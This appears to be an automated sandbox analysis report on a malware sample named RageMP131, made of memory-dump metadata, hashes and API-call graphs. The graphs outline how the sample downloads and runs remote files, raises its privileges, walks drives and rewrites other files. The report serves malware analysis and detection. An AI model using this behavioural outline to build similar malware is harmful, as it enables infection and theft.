                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 15505ae4584f91191ef75b2f158c6094fda56cdb4592a16f99b658929fda9251
                                    • Instruction ID: b5117a28da477e9e8117b29fdda195bdf4d8bcf490abf96006e06ce4e3015a75
                                    • Opcode Fuzzy Hash: 15505ae4584f91191ef75b2f158c6094fda56cdb4592a16f99b658929fda9251
                                    • Instruction Fuzzy Hash: 36E1C071A002059FCB18DF6CC895A6DBBB5FF89310F248669E8199B395E730ED51CBD0
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0093844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: eaeef6b1b14fea8973f99ecd35b966bab7717630b8d2b4d92eb54b3b4d896e50
                                    • Instruction ID: 8dae91ea564b0e46a1e93356f6440c0948cae5caaca03768bb6a1b18090bed8a
                                    • Opcode Fuzzy Hash: eaeef6b1b14fea8973f99ecd35b966bab7717630b8d2b4d92eb54b3b4d896e50
                                    • Instruction Fuzzy Hash: 6AC1E4719107499FDB08CF68CD89BAEBB72BF55304F148348F404AB692DB74AA85CF91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00938051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00938060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 35fe1b558269db3a27ef9080ade52d0524b0f384cad1b15d31057313e4c8cbcc
                                    • Instruction ID: 11d8f94e84c57d37080adff44ffaa6d993cd5cfc2db84bd355e6c3748303459f
                                    • Opcode Fuzzy Hash: 35fe1b558269db3a27ef9080ade52d0524b0f384cad1b15d31057313e4c8cbcc
                                    • Instruction Fuzzy Hash: C69107709002099FDB18CFA8CC85BDEFBB5FF45314F144659F400AB6A2D7B4AA84CB91
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00933C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: 3fd519e47d4596a7e9b6f86a184526ed051c8c0c5997a58841d6b3f5192ad832
                                    • Instruction ID: 3ac0523ff6c317e8b9404c43cb18fe62fbbbea08d92b449aca7724ad9ef23f03
                                    • Opcode Fuzzy Hash: 3fd519e47d4596a7e9b6f86a184526ed051c8c0c5997a58841d6b3f5192ad832
                                    • Instruction Fuzzy Hash: 5F4103B1910308ABCB04DF58DC45BAAF7B8EF45320F14861AF954A7681E774AA40CFA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A4E29
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A4E42
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A594D
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A5966
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: e8a7554de694eb0bf6ca26e3e47ab43575f3f98d048b822e0e50a52067c580d9
                                    • Instruction ID: 8c79f2891ce36ccf24cd387c0b5711a10441b0031068c9da70ffa8d46329e676
                                    • Opcode Fuzzy Hash: e8a7554de694eb0bf6ca26e3e47ab43575f3f98d048b822e0e50a52067c580d9
                                    • Instruction Fuzzy Hash: CB51DFB0D00248DBDF14DFA4DC89BDEBBB4BF46304F144259E454AB282D7746A888B92
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 009A99F1
                                    Strings
                                    • type must be boolean, but is , xrefs: 009A9AE2
                                    • type must be string, but is , xrefs: 009A9A58
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: eaad62cc9a243781514cb76e0a142b4e07cae38081b1c5199c769301584f0080
                                    • Instruction ID: a7c8e8a12d8a5a466b5f381068db50c61927a4dccc4ac92009644a4c03026049
                                    • Opcode Fuzzy Hash: eaad62cc9a243781514cb76e0a142b4e07cae38081b1c5199c769301584f0080
                                    • Instruction Fuzzy Hash: 90316CB5904248AFCB04EBA4D842BAFB7BCFB45300F144669F415D7682EB34AA04C792

                                    Execution Graph

                                    Execution Coverage:26.1%
                                    Dynamic/Decrypted Code Coverage:10.3%
                                    Signature Coverage:0%
                                    Total number of Nodes:300
                                    Total number of Limit Nodes:14
                                    execution_graph 1011 59615d 1012 59615f VirtualFree 1011->1012 1019 5960c7 1012->1019 1013 596198 VirtualFree 1021 5961b2 1013->1021 1014 5960d5 VirtualAlloc 1014->1019 1015 596389 VirtualProtect 1018 5963b7 1015->1018 1016 5963fc VirtualProtect 1017 596400 1016->1017 1018->1016 1020 5963e7 VirtualProtect 1018->1020 1019->1012 1019->1013 1019->1014 1020->1016 1020->1018 1021->1015 1022 5962fb 1021->1022 1023 5914e1 1024 5914fd GetModuleHandleA 1023->1024 1025 591541 1023->1025 1026 59151a VirtualQuery 1024->1026 1027 591512 1024->1027 1028 591549 1025->1028 1029 591573 1025->1029 1026->1027 1027->1025 1031 591569 1028->1031 1032 591557 1028->1032 1036 591638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1029->1036 1052 591af9 1032->1052 1033 591579 ExitProcess 1035 591566 1035->1031 1037 59167a 1036->1037 1038 59167f 1036->1038 1076 59139f GetVersionExA 1037->1076 1058 591718 GetSystemTimeAsFileTime 1038->1058 1041 591686 1042 5916ca 1041->1042 1047 5916a0 CreateThread 1041->1047 1043 5916d0 1042->1043 1044 5916d7 1042->1044 1070 591581 1043->1070 1045 5916dd lstrcpy 1044->1045 1046 5916d5 1044->1046 1045->1033 1046->1033 1063 592c48 memset 1047->1063 1308 591099 1047->1308 1051 591718 3 API calls 1051->1042 1053 591b09 1052->1053 1054 591b11 1052->1054 1055 591638 188 API calls 1053->1055 1056 591b16 CreateThread 1054->1056 1057 591b0f 1054->1057 1055->1057 1056->1057 1327 591638 189 API calls 1056->1327 1057->1035 1057->1057 1059 591735 SHSetValueA 1058->1059 1060 591754 1058->1060 1062 591786 __aulldiv 1059->1062 1061 59175a SHGetValueA 1060->1061 1060->1062 1061->1062 1062->1041 1097 591973 PathFileExistsA 1063->1097 1065 592cb2 1066 5916ba WaitForSingleObject 1065->1066 1067 592cbb VirtualFree 1065->1067 1066->1051 1067->1066 1068 592c8f CreateThread WaitForMultipleObjects 1068->1065 1119 592b8c memset GetLogicalDriveStringsA 1068->1119 1288 59185b GetSystemTimeAsFileTime srand rand srand rand 1070->1288 1072 591592 wsprintfA wsprintfA lstrlen CreateFileA 1073 5915fb WriteFile CloseHandle 1072->1073 1074 591633 1072->1074 1073->1074 1075 59161d ShellExecuteA 1073->1075 1074->1046 1075->1074 1077 5914da 1076->1077 1078 5913cf LookupPrivilegeValueA 1076->1078 1077->1038 1079 5913ef 1078->1079 1080 5913e7 1078->1080 1079->1077 1294 59120e GetModuleHandleA GetProcAddress 1079->1294 1289 59119f GetCurrentProcess OpenProcessToken 1080->1289 1086 591448 GetCurrentProcessId 1086->1077 1087 591457 1086->1087 1087->1077 1088 591319 3 API calls 1087->1088 1089 59147f 1088->1089 1090 591319 3 API calls 1089->1090 1091 59148e 1090->1091 1091->1077 1092 591319 3 API calls 1091->1092 1093 5914b4 1092->1093 1094 591319 3 API calls 1093->1094 1095 5914c3 1094->1095 1096 591319 3 API calls 1095->1096 1096->1077 1098 5919a0 1097->1098 1099 591ac7 1097->1099 1100 5919af CreateFileA 1098->1100 1099->1065 1099->1068 1101 591a28 GetFileSize 1100->1101 1102 5919c4 Sleep 1100->1102 1103 591a38 1101->1103 1104 591a80 1101->1104 1102->1100 1105 5919d5 1102->1105 1103->1104 1106 591a3d VirtualAlloc 1103->1106 1107 591a8d FindCloseChangeNotification 1104->1107 1108 591a96 1104->1108 1118 59185b GetSystemTimeAsFileTime srand rand srand rand 1105->1118 1106->1104 1110 591a53 1106->1110 1107->1108 1111 591aad 1108->1111 1112 591a9c DeleteFileA 1108->1112 1110->1104 1114 591a59 ReadFile 1110->1114 1111->1099 1117 591ab8 VirtualFree 1111->1117 1112->1111 1113 5919da wsprintfA CopyFileA 1113->1101 1116 591a0d CreateFileA 1113->1116 1114->1104 1114->1110 1116->1101 1116->1112 1117->1099 1118->1113 1120 592c09 WaitForMultipleObjects 1119->1120 1125 592bc8 1119->1125 1122 592c2a CreateThread 1120->1122 1123 592c3c 1120->1123 1121 592bfa lstrlen 1121->1120 1121->1125 1122->1123 1130 592845 1122->1130 1124 592bd2 GetDriveTypeA 1124->1121 1124->1125 1125->1121 1125->1124 1126 592be3 CreateThread 1125->1126 1126->1121 1127 592b7d 1126->1127 1141 5929e2 memset wsprintfA 1127->1141 1278 59274a memset memset SHGetSpecialFolderPathA wsprintfA 1130->1278 1132 592878 DeleteFileA 1134 59289a 1132->1134 1135 59288c VirtualFree 1132->1135 1133 592853 1133->1132 1138 592692 8 API calls 1133->1138 1139 592859 1133->1139 1136 5928ab 1134->1136 1137 5928a4 CloseHandle 1134->1137 1135->1134 1137->1136 1138->1133 1140 59239d 186 API calls 1139->1140 1140->1133 1142 592a3a memset lstrlen lstrcpyn strrchr 1141->1142 1143 592abc memset memset FindFirstFileA 1141->1143 1142->1143 1144 592a88 1142->1144 1155 5928b8 memset wsprintfA 1143->1155 1144->1143 1146 592a9a lstrcmpiA 1144->1146 1148 592aad lstrlen 1146->1148 1149 592b74 1146->1149 1148->1143 1148->1146 1150 592b61 FindNextFileA 1151 592b6d FindClose 1150->1151 1152 592b23 1150->1152 1151->1149 1153 5928b8 174 API calls 1152->1153 1154 592b35 lstrcmpiA 1152->1154 1153->1150 1154->1151 1154->1152 1156 592905 1155->1156 1161 592951 memset 1155->1161 1157 59291b memset wsprintfA 1156->1157 1158 592956 strrchr 1156->1158 1156->1161 1159 5929e2 180 API calls 1157->1159 1160 592967 lstrcmpiA 1158->1160 1158->1161 1159->1161 1162 592988 lstrcmpiA 1160->1162 1163 59297a 1160->1163 1161->1150 1162->1161 1165 592994 1162->1165 1173 591e6e 1163->1173 1166 5929ad strstr 1165->1166 1167 5929a5 lstrcpy 1165->1167 1168 5929cb 1166->1168 1169 5929d3 1166->1169 1167->1166 1216 59239d strstr 1168->1216 1238 592692 1169->1238 1174 591e7d 1173->1174 1247 591df6 strrchr 1174->1247 1177 591eb0 SetFileAttributesA CreateFileA 1178 592332 1177->1178 1179 591edf 1177->1179 1181 59233d UnmapViewOfFile 1178->1181 1182 592346 1178->1182 1252 591915 1179->1252 1181->1182 1183 59234b CloseHandle 1182->1183 1184 592350 1182->1184 1183->1184 1186 592391 1184->1186 1187 592356 CloseHandle 1184->1187 1186->1161 1187->1186 1188 591f2e 1188->1178 1258 591c81 1188->1258 1192 591f92 1193 591c81 2 API calls 1192->1193 1194 591f9f 1193->1194 1194->1178 1195 591af9 169 API calls 1194->1195 1196 592024 1194->1196 1200 591fc0 1195->1200 1196->1178 1197 591af9 169 API calls 1196->1197 1198 59207a 1197->1198 1199 591af9 169 API calls 1198->1199 1204 592090 1199->1204 1200->1178 1200->1196 1201 591af9 169 API calls 1200->1201 1202 591ffe 1201->1202 1203 592013 FlushViewOfFile 1202->1203 1203->1196 1205 5920bb memset memset 1204->1205 1206 5920f5 1205->1206 1207 591c81 2 API calls 1206->1207 1208 5921de 1207->1208 1209 592226 memcpy UnmapViewOfFile CloseHandle 1208->1209 1263 591b8a 1209->1263 1211 59226e 1271 59185b GetSystemTimeAsFileTime srand rand srand rand 1211->1271 1213 5922ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1214 591915 3 API calls 1213->1214 1215 59231f CloseHandle 1214->1215 1215->1178 1217 5923d8 1216->1217 1218 592451 CreateFileA GetFileSize 1216->1218 1217->1218 1223 592687 1217->1223 1219 592480 1218->1219 1220 592675 CloseHandle 1218->1220 1219->1220 1222 592499 1219->1222 1221 59267c RemoveDirectoryA 1220->1221 1221->1223 1224 591915 3 API calls 1222->1224 1223->1161 1225 5924a4 9 API calls 1224->1225 1273 59189d memset CreateProcessA 1225->1273 1228 59255c Sleep memset wsprintfA 1229 5929e2 163 API calls 1228->1229 1230 592597 memset wsprintfA Sleep 1229->1230 1231 59189d 6 API calls 1230->1231 1232 5925e4 Sleep CreateFileA 1231->1232 1233 591915 3 API calls 1232->1233 1234 592610 CloseHandle 1233->1234 1234->1221 1235 59261e 1234->1235 1235->1221 1236 592641 SetFilePointer WriteFile 1235->1236 1236->1221 1237 592667 SetEndOfFile 1236->1237 1237->1221 1239 5926b2 WaitForSingleObject 1238->1239 1240 5926a2 CreateEventA 1238->1240 1241 592708 1239->1241 1242 5926c1 lstrlen ??2@YAPAXI 1239->1242 1240->1239 1243 592736 SetEvent 1241->1243 1245 592718 lstrcpy ??3@YAXPAX 1241->1245 1242->1243 1244 5926da lstrcpy 1242->1244 1243->1161 1246 5926f1 1244->1246 1245->1246 1246->1243 1248 591e13 lstrcpy strrchr 1247->1248 1249 591e62 1247->1249 1248->1249 1250 591e40 lstrcmpiA 1248->1250 1249->1177 1249->1178 1250->1249 1251 591e52 lstrlen 1250->1251 1251->1249 1251->1250 1253 591928 1252->1253 1256 591924 SetFilePointer CreateFileMappingA MapViewOfFile 1252->1256 1254 59194f 1253->1254 1255 59192e memset GetFileTime 1253->1255 1254->1256 1257 591954 SetFileTime 1254->1257 1255->1256 1256->1178 1256->1188 1257->1256 1259 591c9c 1258->1259 1260 591c94 1258->1260 1259->1260 1261 591cae memset memset 1259->1261 1260->1178 1262 59185b GetSystemTimeAsFileTime srand rand srand rand 1260->1262 1261->1260 1262->1192 1264 591b93 1263->1264 1272 59185b GetSystemTimeAsFileTime srand rand srand rand 1264->1272 1266 591bca srand 1267 591bd8 rand 1266->1267 1268 591c08 1267->1268 1268->1267 1269 591c29 memset memcpy lstrcat 1268->1269 1269->1211 1271->1213 1272->1266 1274 59190c 1273->1274 1275 5918e0 CloseHandle WaitForSingleObject 1273->1275 1274->1221 1274->1228 1276 5918fb GetExitCodeProcess 1275->1276 1277 591907 CloseHandle 1275->1277 1276->1277 1277->1274 1287 59185b GetSystemTimeAsFileTime srand rand srand rand 1278->1287 1280 5927b5 wsprintfA CopyFileA 1281 5927de wsprintfA 1280->1281 1282 592840 1280->1282 1283 591973 17 API calls 1281->1283 1282->1133 1284 59280f 1283->1284 1285 592820 CreateFileA 1284->1285 1286 592813 DeleteFileA 1284->1286 1285->1282 1286->1285 1287->1280 1288->1072 1290 591200 CloseHandle 1289->1290 1291 5911c6 AdjustTokenPrivileges 1289->1291 1290->1079 1292 5911f7 CloseHandle 1291->1292 1293 5911f6 1291->1293 1292->1290 1293->1292 1295 59123f GetCurrentProcessId OpenProcess 1294->1295 1296 591310 1294->1296 1295->1296 1299 591262 1295->1299 1296->1077 1303 591319 1296->1303 1297 5912b0 VirtualAlloc 1297->1299 1302 5912b8 1297->1302 1298 5912f1 CloseHandle 1298->1296 1300 591302 VirtualFree 1298->1300 1299->1297 1299->1298 1301 591296 VirtualFree 1299->1301 1299->1302 1300->1296 1301->1297 1302->1298 1304 59134a 1303->1304 1305 59132a GetModuleHandleA GetProcAddress 1303->1305 1306 591351 memset 1304->1306 1307 591363 1304->1307 1305->1304 1305->1307 1306->1307 1307->1077 1307->1086 1309 591196 1308->1309 1310 5910ba 1308->1310 1310->1309 1326 59185b GetSystemTimeAsFileTime srand rand srand rand 1310->1326 1312 591118 wsprintfA wsprintfA URLDownloadToFileA 1313 591168 lstrlen Sleep 1312->1313 1314 5910dc 1312->1314 1313->1310 1317 591000 CreateFileA 1314->1317 1318 591092 WinExec lstrlen 1317->1318 1319 591025 GetFileSize CreateFileMappingA MapViewOfFile 1317->1319 1318->1309 1318->1310 1320 59107b 1319->1320 1321 591057 1319->1321 1322 59108d CloseHandle 1320->1322 1323 591087 CloseHandle 1320->1323 1324 591061 1321->1324 1325 591074 UnmapViewOfFile 1321->1325 1322->1318 1323->1322 1324->1325 1325->1320 1326->1312 1342 592361 1343 59236b UnmapViewOfFile 1342->1343 1344 592374 1342->1344 1343->1344 1345 592379 CloseHandle 1344->1345 1346 592382 1344->1346 1345->1346 1347 592388 CloseHandle 1346->1347 1348 592391 1346->1348 1347->1348 1349 596014 1350 596035 GetModuleHandleA 1349->1350 1352 59605f 1349->1352 1351 59604d GetProcAddress 1350->1351 1353 596058 1351->1353 1353->1351 1353->1352 1353->1353 1328 596076 1329 59607b 1328->1329 1333 5960c7 1328->1333 1331 5960b0 VirtualAlloc 1329->1331 1329->1333 1340 5961b2 1329->1340 1330 59615f VirtualFree 1330->1333 1331->1333 1332 596198 VirtualFree 1332->1340 1333->1330 1333->1332 1334 5960d5 VirtualAlloc 1333->1334 1334->1333 1335 596389 VirtualProtect 1338 5963b7 1335->1338 1336 5963fc VirtualProtect 1337 596400 1336->1337 1338->1336 1339 5963e7 VirtualProtect 1338->1339 1339->1336 1339->1338 1340->1335 1341 5962fb 1340->1341

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_0059185B 1 Function_0059615D 5 Function_005966C8 1->5 2 Function_0059235D 3 Function_005917D0 4 Function_00592C48 12 Function_00591973 4->12 38 Function_00592B8C 4->38 45 Function_00596D00 5->45 46 Function_00596B02 5->46 47 Function_00596A84 5->47 6 Function_0059274A 6->0 6->12 7 Function_00592845 7->6 27 Function_0059239D 7->27 31 Function_00592692 7->31 8 Function_00591AF9 48 Function_00591638 8->48 9 Function_00596CF8 10 Function_00592B7D 22 Function_005929E2 10->22 11 Function_00592CF0 12->0 13 Function_00596CF2 13->9 14 Function_00596076 14->5 15 Function_00591DF6 16 Function_00591C68 17 Function_00591E6E 17->0 17->8 17->15 17->16 20 Function_00592D60 17->20 26 Function_00592D9B 17->26 33 Function_00591915 17->33 35 Function_00591D8A 17->35 36 Function_00591B8A 17->36 43 Function_00591C81 17->43 18 Function_005914E1 18->8 18->48 19 Function_00592361 19->26 21 Function_00596B63 50 Function_005969B0 21->50 51 Function_00596834 21->51 53 Function_005967A4 21->53 49 Function_005928B8 22->49 23 Function_00591099 23->0 44 Function_00591000 23->44 24 Function_00591319 25 Function_00591718 25->11 27->22 28 Function_0059189D 27->28 27->33 29 Function_0059119F 30 Function_0059139F 30->24 30->29 40 Function_0059120E 30->40 32 Function_00596012 34 Function_00596014 36->0 37 Function_0059600A 38->7 38->10 39 Function_0059680F 41 Function_00591581 41->0 42 Function_00596001 42->37 44->3 45->13 45->21 45->50 46->21 47->13 47->39 48->3 48->4 48->23 48->25 48->30 48->41 49->17 49->22 49->27 49->31 52 Function_00596734 52->45 52->46 52->47 54 Function_005965A6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 5929e2-592a34 memset wsprintfA 102 592a3a-592a86 memset lstrlen lstrcpyn strrchr 101->102 103 592abc-592b21 memset * 2 FindFirstFileA call 5928b8 memset 101->103 102->103 104 592a88-592a98 102->104 110 592b61-592b6b FindNextFileA 103->110 104->103 106 592a9a-592aa7 lstrcmpiA 104->106 108 592aad-592aba lstrlen 106->108 109 592b74-592b7a 106->109 108->103 108->106 111 592b6d-592b6e FindClose 110->111 112 592b23-592b2a 110->112 111->109 113 592b4c-592b5c call 5928b8 112->113 114 592b2c-592b33 112->114 113->110 114->113 116 592b35-592b4a lstrcmpiA 114->116 116->111 116->113
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
